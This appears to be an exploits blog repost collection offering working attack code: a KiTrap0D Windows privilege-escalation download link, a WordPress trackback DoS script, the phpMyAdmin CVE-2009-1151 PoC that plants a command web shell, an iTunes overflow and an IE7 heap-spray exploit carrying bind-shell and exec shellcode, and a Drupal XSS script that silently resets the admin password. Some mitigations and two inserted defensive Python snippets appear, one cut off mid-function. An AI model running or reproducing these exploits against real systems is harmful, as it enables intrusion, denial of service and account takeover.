EXPLOIT [0-day] for all versions of Microsoft Windows

Posted by zerialkiller in exploits with 2 comments

Details have been published of a serious vulnerability in every version
of Windows that allows privilege escalation on the system. No patch is
available and the exploit is within anyone's reach, which makes it a
serious "0-day" for Microsoft.

Tavis Ormandy, a well-known security researcher who has found numerous
security flaws in many different programs, has published an exploit for
a vulnerability that allows privilege escalation in Windows. It is a
design flaw carried by every 32-bit Windows (based on NT technology)
since 1993. That covers everything from NT to Windows 7, passing through
2000, 2003, 2008, XP and Vista.

The flaw lies in the legacy support for 16-bit applications. The context
and stack switch performed when calling the GP trap handler is not
validated correctly. Windows makes several mistakes and incorrectly
assumes that:

* The SeTcbPrivilege privilege is required to set up a VDM (Virtual DOS
Machine) context.
* Ring 3 code cannot install arbitrary code segment selectors. Using
Virtual-8086 mode, it can.
* Code running in ring 3 (user space) cannot forge a "trap frame".

Ormandy manages to get around all three points, and the result is that a
user can perform a context switch into the kernel and run code as SYSTEM,
the highest privilege on the system.

To bypass the third point, access is needed to a memory address that is
always the same on every Windows except Vista and Windows 7, which
"randomize" where things are loaded in memory. That is supposed to
protect against this kind of attack. However, using
NtQuerySystemInformation(), it is possible to compute where that address
is even though it differs on every boot, so the ASLR (Address Space
Layout Randomization) protection is bypassed as well.

Ormandy notified Microsoft in June 2009, and shortly afterwards they
confirmed the problem. Fed up with them not publishing a fix (which he
considers not very complex), he decided to make the flaw public. He
himself acknowledges that this vulnerability most seriously affects
businesses and corporations that keep their users on limited privileges.
Unfortunately, most home users already use the administrator account on
their Windows (not as powerful as SYSTEM, but equivalent for practical
purposes) for everyday tasks, so privilege escalation is usually not a
requirement in attacks against them.

The exploit has been tested and works perfectly. The good news is that
the problem is relatively easy to mitigate. He has even published videos
on YouTube showing how, aimed mainly at administrators. Avoiding the flaw
means disabling support for 16-bit applications, which should be no
problem for most users.

The steps are as follows:

From the policy console (gpedit.msc) open "Computer Configuration",
"Administrative Templates", "Windows Components", "Application
Compatibility" and enable the policy "Prevent access to 16-bit
applications". It is important to make sure it is actually applied to
the systems that depend on the domain controller by forcing a policy
update.

AND EXCLUSIVELY FOR YOU, THE EXPLOIT

DOWNLOAD EXPLOIT

http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

...the exploit works very well on Win7

http://gol14th.diosdelared.com/?coment=5255

BackTrack 4 Final Released

Posted by zerialkiller in exploits, inseguridades, instalar backtrack3, linux with 0 comments

They have finally released BackTrack 4; here is the download link so we can all enjoy it

Best of luck to everyone...

http://www.backtrack-linux.org/downloads/

Serious new bug in WordPress

Posted by zerialkiller in exploits with 0 comments

The problem lies in the wp-trackback.php file and lets any novice, individual or person take any blog that uses WordPress as its CMS offline with just 5 minutes and about twenty requests. You read that right: only 20 requests; no botnets, zombie networks or supercomputers are needed to carry out this kind of DoS attack.

For now this exploit has been published; it is written in PHP and run from the console, passing the URL of the vulnerable site as a parameter, something like this:

php exploit.php http://blogvulnerable.com

And here is the exploit code:

<?php
//wordpress Resource exhaustion Exploit
//http://rooibo.wordpress.com/
//security@wordpress.org contacted and get a response,
//but no solution available.
if(count($argv) < 2) {
    echo "You need to specify a url to attack\n";
    exit;
}
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2) {
    echo "The url should have http:// in front of it, and should be complete.\n";
    exit;
}
if(count($data) == 2) {
    $path = '';
} else {
    $path = $data['path'];
}
$path = trim($path,'/');
$path .= '/wp-trackback.php';
if($path{0} != '/') {
    $path = '/'.$path;
}
// Oversized title and a charset list made of thousands of "UTF-8," entries
$b = "";
$b = str_pad($b,140000,'ABCEDFG');
$b = utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
$count = 0;
while(1) {
    $fp = @fsockopen($data['host'],80);
    if(!$fp) {
        if($count > 0) {
            echo "down!!!!\n";
            exit;
        }
        echo "unable to connect to: ".$data['host']."\n";
        exit;
    }
    fputs($fp, "POST $path HTTP/1.1\r\n");
    fputs($fp, "Host: ".$data['host']."\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: ".strlen($str)."\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    fputs($fp, $str."\r\n\r\n");
    echo "hit!\n";
    $count++;
}
?>

There is still no patch to fix the bug; the only known workaround so far is the one described at the link where the patch is explained:

Edit the wp-trackback.php file and look for this line:

$charset = $_POST['charset'];

and change it to this:

$charset = str_replace(",","",$_POST['charset']);
if(is_array($charset)) { exit; }

For more information you can visit that link, where they explain in much more depth what the bug consists of; so, everyone go and fix your WordPress to avoid future headaches.

Thanks to inconinformatico.net for sharing the news.

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

Posted by zerialkiller in exploits with 5 comments

#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)
# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
	echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
	echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
	exit
fi

if ! which curl >/dev/null
then
	echo "sorry but you need curl for this script to work!"
	echo "on Debian/Ubuntu: sudo apt-get install curl"
	exit
fi

function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

	flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"

	echo "[+] attempting to inject phpinfo() ..."
	curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

	if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
	then
		curl -ks --url "$3/config/config.inc.php" >$flag
		echo "[+] success! phpinfo() injected successfully! output saved on $flag"
		curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
		echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
		echo "    $3/config/config.inc.php?c=ls+-l+/"
		echo "    $3/config/config.inc.php?p=phpinfo();"
		echo "    please send any feedback/improvements for this script to"\
		"unknown.pentester<AT_sign__here>gmail.com"
	else
		echo "[+] no luck injecting to $3/config/config.inc.php :( "
		exit
	fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
	length=`echo -n $token | wc -c`

	# valid form token obtained?
	if [[ $length -eq 32 ]]
	then
		echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
		# attempt exploit!
		exploit $token $cookiejar $1
	else
		echo "[+] could not grab form token. you might want to try exploiting the vuln manually :( "
		exit
	fi
else
	echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
	exit
fi
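As an added defensive example covering both the WordPress trackback DoS post above and this phpMyAdmin PoC (my own code, not from either author), the following Python runs two detection rules over constructed access-log lines: a burst of oversized POSTs to wp-trackback.php from one client, and a POST to scripts/setup.php followed by requests for config/config.inc.php from the same client. The log format is Apache combined plus a trailing request-body-size field (mod_logio %I), which is an assumption; all addresses and lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" format with one extra trailing field: the request body size
# (mod_logio's %I). Both the format and every sample line are constructed here.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"(?: (?P<received>\d+))?$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S"


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["time"] = datetime.strptime(ev["time"].split()[0], TIME_FMT)  # drop tz offset
    ev["received"] = int(ev["received"]) if ev["received"] else 0
    return ev


def detect_trackback_flood(events, threshold=20, window_seconds=300, min_body=100_000):
    """Flag the wp-trackback.php pattern: one oversized trackback body (the PoC pads
    charset and title to ~140 kB each) or `threshold` POSTs from one client inside
    `window_seconds` (the post says about twenty requests suffice)."""
    alerts = []
    per_ip = defaultdict(list)
    for ev in events:
        if ev["method"] == "POST" and ev["path"].endswith("/wp-trackback.php"):
            if ev["received"] >= min_body:
                alerts.append(("oversized-trackback", ev["ip"], ev["received"]))
            per_ip[ev["ip"]].append(ev["time"])
    for ip, times in per_ip.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                alerts.append(("trackback-flood", ip, threshold))
                break
    return alerts


def detect_setup_injection(events):
    """Flag the CVE-2009-1151 pattern: a POST to phpMyAdmin's scripts/setup.php from a
    client that then fetches config/config.inc.php (the file the PoC writes into)."""
    alerts = []
    posted = set()
    for ev in events:
        if ev["method"] == "POST" and ev["path"].endswith("/scripts/setup.php"):
            posted.add(ev["ip"])
        elif "/config/config.inc.php" in ev["path"] and ev["ip"] in posted:
            alerts.append(("setup-php-injection", ev["ip"], ev["path"]))
    return alerts


def run_detection(lines):
    """Parse raw log lines and run both detectors; returns a list of alert tuples."""
    events = [ev for ev in (parse_line(l) for l in lines) if ev]
    return detect_trackback_flood(events) + detect_setup_injection(events)


def _line(ip, when, method, path, received=0):
    return (f'{ip} - - [{when} +0000] "{method} {path} HTTP/1.1" 200 512 '
            f'"-" "Mozilla/5.0" {received}')


# Constructed sample: 20 padded trackback POSTs in 40 seconds from one address,
# a normal trackback from another, and the setup.php write-then-fetch sequence.
SAMPLE_LOG = (
    [_line("203.0.113.5", f"10/Jan/2010:12:00:{s:02d}", "POST", "/wp-trackback.php", 281_000)
     for s in range(0, 40, 2)]
    + [_line("198.51.100.7", "10/Jan/2010:12:05:00", "POST", "/blog/wp-trackback.php", 340),
       _line("198.51.100.7", "10/Jan/2010:12:05:01", "GET", "/blog/", 0),
       _line("203.0.113.9", "10/Jan/2010:12:10:00", "POST", "/phpMyAdmin/scripts/setup.php", 640),
       _line("203.0.113.9", "10/Jan/2010:12:10:01", "GET", "/phpMyAdmin/config/config.inc.php", 0),
       _line("203.0.113.9", "10/Jan/2010:12:10:02", "GET",
             "/phpMyAdmin/config/config.inc.php?p=phpinfo();", 0)]
)

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_LOG):
        print(alert)
```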

Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)

Posted by zerialkiller in exploits with 0 comments

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack  canary protection. Increasing buffer  size leads to
# SEH overwrite but it seems that the Access Violation needed to get  our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the  vulnerability from  Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;)  && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>

from socket import *

html = """
<html>
  <head><title>iTunes loading . . .</title>
  <script>
   function openiTunes(){document.location.assign("itms://itunes.apple.com/");}
   function prepareStack(){document.location.assign("%s");}
   function ownSeh(){document.location.assign("%s");}
   function ipwn(){
    prepareStack();
    ownSeh();
   }
   function main() {
    openiTunes();
    // Increase this timeout if your iTunes takes more time to load!
    setTimeout('ipwn()',20000);
   }
  </script>
  </head>
  <body onload="main();">
    <p align="center">
    <b>iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950</b>
    </p>
    <p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>
    <p align="center"><b>www.offensive-security.com</b></p>
    <p align="center">
    iTunes starting... wait for 20 secs; if you get an error, click "Ok"
    in the MessageBox before checking for your shell on port 4444 :) <br/>
    If victim host is not connected to the internet, exploit will fail
    unless iTunes is already opened and you disable "openiTunes" javascript
    function.
    <br/>
    <h2 align="center">
    <b><u>This exploit works if opened from Firefox not from IE!</u></b>
    </h2>
    <p align="center">
    After exploitation iTunes crashes, you need to kill it from TaskManager
    <br/>have fun!</br>
    </p>
    </p>
  </body>
</html>"""

# Alpha2 ASCII  printable  Shellcode  730 Bytes, via  EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode  is modified
# in order to obtain register alignment and to  reset ESP and EBP we  mangled
# before. Rest of decoded shellcode is Metasploit  bind  shell  on  port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
             "5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
             "tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
             "uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
             "KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
             "8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
             "b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
             "k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
             "EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
             "0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
             "ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
             "KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1          = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align           = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2          = "\x41"*570

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret             = "\x2a\x5e\x21\x67"

# Let the dance begin... Point EBP to encoded jmp
align_for_jmp   = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back        = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
                   "AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3          = "\x43"*162

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1            = "itms://:" + "\x41"*200 + "/"
url2            = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
                               align_for_jmp + jmp_back + pad0x3
payload         = html % (url1, url2)

print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()

MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)

Posted by zerialkiller in exploits with 0 comments

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Based on the code found by str0ke in the wild for MS09-002
#   - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
#   Usage  : python ie_ms09002.py [port]
#

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):

    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
        payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
        payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
        payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
        payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
        payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
        payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
        payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
        payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
        payload += '\x0a\x02\xb1\x0e';
        return self.convert_to_utf16(payload)

    def get_exploit(self):
        exploit = '''

        function spray_heap()
        {
            var payload = unescape("<PAYLOAD>");

            var ret = 0x0c0c0c0c;
            var heap_chunk_size = 0x40000;

            var nopsled_size = heap_chunk_size - (payload.length * 2)
            var nopsled = unescape("%u0c0c%u0c0c");
            while (nopsled.length < nopsled_size)
                nopsled += nopsled;

            heap_chunks = new Array();
            heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
            for (var i = 0 ; i < heap_chunks_num ; i++)
                heap_chunks[i] = nopsled + payload;
        }

        function trigger_bug()
        {
            var obj = document.createElement("table");
            obj.click;

            var obj_cp = obj.cloneNode();
            obj.clearAttributes();
            obj = null;

            CollectGarbage();

            var img = document.createElement("img");
            img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");

	        obj_cp.click;
        }

        if (navigator.userAgent.indexOf("MSIE 7") != -1) {
            spray_heap();
            trigger_bug()
        } else
            window.location = "about:blank"

        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = '<html><body><script>' + exploit + '</script></body></html>'
        return exploit

    def convert_to_utf16(self, payload):
        # From Beta v2.0 by Berend-Jan Wever
        # http://www.milw0rm.com/exploits/656
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i+j]) & 0xff) << (j*8)
            enc_payload += '%%u%04x' % num
        return enc_payload

    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        print '[-] Incoming connection from %s' % self.client_address[0]
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        print '[-] Sending exploit to %s ...' % self.client_address[0],
        self.wfile.write(self.get_exploit())
        print 'done'

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    port = None
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
    try:
        serv = HTTPServer(('', port), RequestHandler)
        ip = socket.gethostbyname(socket.gethostname())
        print '[-] Web server is running at http://%s:%d/' % (ip, port)
    except socket.error:
        print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)
    try:
        serv.serve_forever()
    except KeyboardInterrupt:
        print '[-] Exiting ...'

if __name__ == '__main__':
    main()

# milw0rm.com [2009-03-04]

drupal-passwdxss.txt

Posted by zerialkiller in exploits with 0 comments

Small write up regarding a cross site scripting vulnerability on Drupal version 5.15 being used for a password change attack. Attack script included.

Problem Description:

There have been quite a few Cross Site Scripting (XSS) vulnerabilities
discovered in Drupal modules recently.  Many people scoff at XSS and
even argue that it's a low threat vulnerability.  In many cases this is
certainly true, however XSS can be used as an element in an attack that
leverages other security weaknesses to devastating consequence.  A case
in point is the password changing option in Drupal.  Drupal does a
wonderful job in preventing against Cross Site Request Forgery (XSRF or
CSRF) by placing tokens in forms to validate posts.  Drupal provides a
token in the id "edit-user-edit-form-token" in the edit user form (found
at ?a=user/X/edit where X is the user id number).  A sample value
contained in this hidden form field is
"5545a410de3662f1844af7ee6f1ee770" - a value sufficiently long and
random that an attacker would have great difficulty in guessing the
value.  However, the Drupal account page doesn't require users to enter
the current account password in order to change the password to a new
value.  This flaw, combined with a well crafted XSS attack, could be
used to change a user's password to an arbitrary value.  What's worse,
Drupal uses session cookies by default that can keep users logged into
the site for days.  This means that a user could be the victim of a
password changing attack and not even realize their password had been
changed for some time (until their session cookie timed out or they
logged out of the site) when they were forced to log back in to the
site.  The user would still be able to request a password reset via
e-mail, so they would not be locked out of the site, but they might have
their account hijacked for some time in the interim.

Exploiting the Flaw:

To accomplish a malicious password change via XSS is quite easy.  The
technique can use an invisible iframe that loads the account editing
page.  This is similar to a cross site request forgery, except that by
embedding the iframe in the target site the request does not even have
to cross domains.  The iframe loads the target page, which includes the
Drupal generated token.  The malicious script can then fill in a new
password and submit the form, invisibly to the user.

I have provided an example of such a script below.  Note that this
script is enhanced in that it will only change the user's password if
the user has a user id of 1, or is the administrative super user.  I've
also left out the logic to alert a remote attacker of a successful
compromise, but this is a simple feature to add.  Once added to any
page, this script will silently assess the user id of any logged in
Drupal user who requests the page.  If the user is the site admin then
their password will be reset to "password" silently, without their
knowledge.

Why the Attack Works:

This attack is possible because Drupal does not require
re-authentication in order to perform a password reset.  Because the
malicious JavaScript writer doesn't have to provide an unknown password,
there is no barrier to the update.  In order to prevent against this
sort of attack Drupal would have to add another field in the password
changing (user edit) screen where users were required to enter their
existing password.

Using the Attack:

The JavaScript snippet below could be injected in any number of ways
into a site.  In fact, many Drupal sites are configured so any content
creator can use the "Full HTML" input format, which is all that is
required to insert JavaScript into Drupal site content.  Any users with
this ability or attackers who compromised such an account, would be able
to attack and compromise the Drupal super user account using this method.

Notes:

Note that in the script below the Drupal site is running at 192.168.0.2
and the URL settings are such that the admin user edit screen is
available at http://192.168.0.2/?q=user/1/edit.  Note that this script
could be altered to update the password of any Drupal user account, not
necessarily just the administrator as it checks the "My account" link
URL to determine the user id of the logged in user viewing the malicious
Drupal content.

This script was tested against Drupal 5.15 on Mozilla Firefox.  Some
modification may be necessary for other versions of Drupal, although
Drupal 6 seems vulnerable as well.  Other browsers may require separate
JavaScript syntax to carry out this attack.

Attack Script:

<script>
function alterUser() {
  var text = document.documentElement.innerHTML;
  var myAccountText = text.indexOf('My account');
  var i = myAccountText-2;
  while (! text.charAt(i).match(/[0-9]/g)) {
    i--;
  }
  myAccountNumber = text.substring(i, myAccountText-2);
  if (myAccountNumber == 1) {
    /*alert(myAccountNumber );*/
    var url = "http://192.168.0.2/?q=user/" + myAccountNumber + "/edit";
    document.write('<iframe id="foo" name="foo" width="1" height="1" >');
    document.write('</iframe>');
    window.frames['foo'].location = url;
    /* Slow it down, let the load happen */
    setTimeout('doNext()', 4000);
   }
}
function doNext() {
    var theDoc = document.getElementById('foo');
    foo.document.getElementById('edit-pass-pass1').value = 'password';
    foo.document.getElementById('edit-pass-pass2').value = 'password';
    foo.document.getElementById('user-edit').submit();
    /* Admin pass changed - TODO: alert evil overlords */
}
alterUser();
</script>

Follow Up:

The Drupal security team has been notified about this issue.  It seems a
mitigation feature may be built into Drupal 7
(http://drupal.org/node/86299, http://drupal.org/node/138805) and a
verify password on change patch does exist (http://drupal.org/node/86711).

The text of this advisory is also available at

http://lampsecurity.org/drupal-xss-password-reset

--
Justin C. Klein Keane

http://www.MadIrish.net

http://www.LAMPSecurity.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
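As an added example (my own model, not Drupal code and not part of the advisory), the following Python sketches the account-edit flow the advisory describes and contrasts the two policies: a form token alone, which a script running in the same origin can read and replay, versus also requiring the current password, the re-authentication the "Why the Attack Works" section calls for. The user store, session handling and PBKDF2 parameters are constructed for the example.

```python
import hashlib
import hmac
import os
import secrets

# Constructed model of the account-edit flow: in-memory users, server-side sessions
# and a per-session form token. PBKDF2 parameters are illustrative, not Drupal's.
ITERATIONS = 50_000


def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def verify_password(stored, candidate):
    salt, digest = stored[:16], stored[16:]
    computed = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, ITERATIONS)
    return hmac.compare_digest(computed, digest)


class AccountService:
    def __init__(self, require_current_password):
        self.require_current_password = require_current_password
        self.users = {}      # uid -> salted password hash
        self.sessions = {}   # session id -> uid
        self.tokens = {}     # session id -> form token of the user-edit form

    def add_user(self, uid, password):
        self.users[uid] = hash_password(password)

    def login(self, uid, password):
        if not verify_password(self.users[uid], password):
            return None
        sid = secrets.token_hex(16)
        self.sessions[sid] = uid
        return sid

    def render_edit_form(self, sid):
        """What the user-edit page exposes to any script in the same origin: the
        hidden token (edit-user-edit-form-token in the advisory)."""
        token = secrets.token_hex(16)
        self.tokens[sid] = token
        return {"uid": self.sessions[sid], "form_token": token}

    def change_password(self, sid, form):
        """Handle the submitted user-edit form. Returns a status string."""
        uid = self.sessions.get(sid)
        if uid is None:
            return "not-logged-in"
        expected = self.tokens.get(sid, "")
        # CSRF token check: Drupal already does this, and it is not enough on its own
        if not expected or not hmac.compare_digest(expected, form.get("form_token", "")):
            return "bad-token"
        if form.get("pass1") != form.get("pass2"):
            return "mismatch"
        if self.require_current_password:   # the re-authentication the advisory asks for
            if not verify_password(self.users[uid], form.get("current", "")):
                return "reauth-failed"
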